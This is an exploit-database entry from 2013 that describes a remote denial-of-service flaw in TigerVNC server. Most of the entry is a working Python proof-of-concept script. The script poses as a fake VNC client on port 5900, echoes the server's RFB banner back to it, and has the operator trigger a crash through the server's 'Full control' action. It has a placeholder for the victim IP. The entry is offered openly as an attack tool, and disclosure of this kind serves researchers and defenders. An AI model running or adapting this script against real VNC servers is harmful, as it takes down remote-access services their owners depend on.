TigerVNC Server Remote DoS Vulnerability

2013-07-29T00:00:00
ID 1337DAY-ID-21040
Type zdt
Reporter Z3r0n3
Modified 2013-07-29T00:00:00

Description

TigerVNC is an advanced VNC implementation. It is based on the fourth generation of VNC. TigerVNC also includes features from the TightVNC and TurboVNC projects. This includes accelerated JPEG compression. TigerVNC supports the latest X.Org X server.

                                        
                                            #!/usr/bin/env python
#================================================================#
# [+] Title: TigerVNC Server Remote DoS Vulnerability            #
# [+] Discovered: 28/07/2013                                     #
# [+] Software Vendor: http://sourceforge.net/projects/tigervnc/ #
# [+] Author: Z3r0n3 - Independent Security Researcher           #                                          
# [+] Contact: [email protected]                                   #
# [+] Overview:                                                  #
#   A remote attacker can crash TigerVNC server by creating      #
#   a fake client. after registring the client, any control      #
#   the server try to do (View-only, Full control...) on the     #
#   client can bring the server down (No one play with clients!) #
#================================================================#

import socket, sys;

def SrvRecv():
    global srvmsg;
    srvmsg=client.recv(1024);
    print("[<-] Srv: ", srvmsg);

host="localhost"; # Put Victim IP  here
port=5900;

print("[+] Creating socket...");
client=socket.socket(socket.AF_INET, socket.SOCK_STREAM);
try:
    print("[+] Trying to connect with TigerVNC server...");
    client.connect((host,port));
except socket.error:
    print("[!] Can't connect...");
    client.close()
    sys.exit()

print("[x] Connected..."); 
SrvRecv()
client.send(srvmsg) # srvmsg="RFB XXX.XXX"

print("""[x] Go to TigerVNC server and click on Full control to obtain a full crash""")
x=input("[x] Don't press anything till the server is down");
client.close();

#  0day.today [2018-03-06]  #